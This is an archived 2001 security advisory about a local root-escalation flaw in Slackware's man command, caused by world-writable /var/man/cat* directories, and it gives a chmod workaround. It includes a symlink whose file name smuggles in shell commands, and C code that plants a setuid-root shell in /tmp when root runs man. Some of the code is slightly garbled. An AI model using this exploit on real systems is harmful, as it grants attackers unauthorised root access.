Slackware /usr/bin/man vulnerability

2001-07-18T00:00:00
ID SECURITYVULNS:DOC:1845
Type securityvulns
Reporter Securityvulns
Modified 2001-07-18T00:00:00

Description

The following advisory was sent to slackware July 11th, 2001, they failed to respond so I hope the temporary patch will make do:

Submitted by : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net) zen-parse (zen-parse@gmx.net) Vulnerability : /usr/bin/man Tested On : Slackware 8.0 and before. Local : Yes Remote : No Temporary Fix : chmod 700 /var/man/cat* Target : root or any other user that uses man Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it, slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance, Insane, rusko, falcon-networks.com. See also : http://www.securityfocus.com/vdb/?id=2815

    Slackware 8.0 and previous issues of Slackware are released with

/var/man/cat*/ chmod 1777:

drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

Since these directories are world writeable we can create symlinks there like so:

`ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=. ;script;man.7" /var/man/cat7/man.7.gz`

When `/usr/bin/man man` is executed by root, it will create /var/man/cat7/man.1.gz. The symlink forces it to create a file in /usr/man/man7 named: "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.; script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

include <stdio.h>

include <unistd.h>

include <sys/types.h>

include <sys/stat.h>

include <sys/wait.h>

include <errno.h>

int main() { FILE *fil; mode_t perm = 06711;

if(!getuid()) { fil = fopen("/tmp/bleh.c","w"); fprintf(fil,"%s\n","#include <unistd.h>"); fprintf(fil,"%s\n","#include <stdio.h>"); fprintf(fil,"%s\n","int main() {"); fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);"); fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);"); fprintf(fil,"%s\n","return 0; }"); fclose(fil); system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c"); unlink("/tmp/bleh.c"); chmod("/tmp/bleh", perm); } execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL); return 0; }

With the above code compiled in /tmp/script, if root were to run `man man`, a suid shell would be left in /tmp/bleh.